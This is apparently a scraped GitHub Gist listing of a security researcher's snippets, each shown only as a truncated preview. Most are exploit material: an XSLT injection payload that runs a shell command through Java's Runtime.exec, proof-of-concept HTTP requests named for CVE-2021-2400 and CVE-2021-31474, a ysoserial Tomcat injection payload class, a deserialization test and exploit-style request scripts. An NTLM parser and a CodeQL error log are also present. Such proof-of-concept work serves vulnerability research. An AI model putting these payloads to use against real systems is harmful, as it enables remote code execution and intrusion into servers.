testanull
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def parseNtlmMsg(msg): | |
| def decode_int(byte_string): | |
| return int(byte_string[::-1].encode('hex'), 16) | |
| def decode_string(byte_string): | |
| return byte_string.replace('\x00', '') | |
| target_info_fields = msg[40:48] | |
| target_info_len = decode_int(target_info_fields[0:2]) | |
| target_info_offset = decode_int(target_info_fields[4:8]) |
testanull
/ select.xslt
Created
September 8, 2022 11:58
— forked from thanatoskira/select.xslt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template> | |
| <!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
| <!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
| <!-- #114 Utf8: open -a calculator --> | |
| <!-- #115 String: touch /tmp/pwn --> | |
| <xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
| <xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
| <!-- #132 Utf8: <init> --> | |
| <AAA select="<init>"/> |
testanull
/ asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py
Created
September 28, 2021 16:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import random | |
| import string | |
| import sys | |
| import time | |
| import requests | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| def id_generator(size=6, chars=string.ascii_lowercase + string.digits): |
testanull
/ PoC_CVE-2021-2400.txt
Created
September 13, 2021 09:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 | |
| Host: 192.168.139.212 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| Content-Type: text/xml | |
| Content-Length: 1317 | |
| <?xml version="1.0"?> | |
| <soap-env:Envelope |
testanull
/ JavaCharStream.java
Created
August 31, 2021 09:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class JavaCharStream | |
| { | |
| public char readChar() throws java.io.IOException | |
| { | |
| //truncated | |
| if ((buffer[bufpos] = c = ReadByte()) != '\\') | |
| { | |
| UpdateLineColumn(c); | |
| // found a non-backslash char. | |
| if ((c == 'u') && ((backSlashCnt & 1) == 1)) |
testanull
/ TomcatEchoInjectOpenAM.java
Created
July 14, 2021 09:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package ysoserial.payloads; | |
| import com.sun.org.apache.xalan.internal.xsltc.DOM; | |
| import com.sun.org.apache.xalan.internal.xsltc.TransletException; | |
| import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; | |
| import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; | |
| import com.sun.org.apache.xml.internal.serializer.SerializationHandler; | |
| import org.apache.catalina.connector.Response; | |
| import org.apache.catalina.connector.ResponseFacade; | |
| import org.apache.catalina.core.ApplicationFilterChain; |
testanull
/ PoC_CVE-2021–31474.json
Created
May 25, 2021 10:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/Action/TestAction HTTP/1.1 | |
| Host: <target> | |
| Content-Length: 3978 | |
| Accept: application/json, text/javascript, */*; q=0.01 | |
| X-XSRF-TOKEN: <token> | |
| X-Requested-With: XMLHttpRequest | |
| ViewLimitationID: 0 | |
| User-Agent: Mozilla/5.0 | |
| Content-Type: application/json; charset=UTF-8 | |
| Cookie: <cookie> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
testanull
/ Test0.java
Created
December 22, 2020 04:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import flex.messaging.io.SerializationContext; | |
| import flex.messaging.io.amf.*; | |
| import org.apache.commons.collections.LRUMap; | |
| import java.io.*; | |
| public class Test0 { | |
| public static void main(String[] args) throws Exception{ | |
| LRUMap lruMap = new LRUMap(); | |
| byte[] ser = serialize(lruMap); |
testanull
/ codeql_err.log
Created
July 29, 2020 12:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql | |
| Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql. | |
| ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9) | |
| Failed [1/1] D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql (3 s). | |
| PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql --no-default-compilation-cache | |
| Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql. | |
| ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9) | |
| Failed [1/1] D:\Research\sem |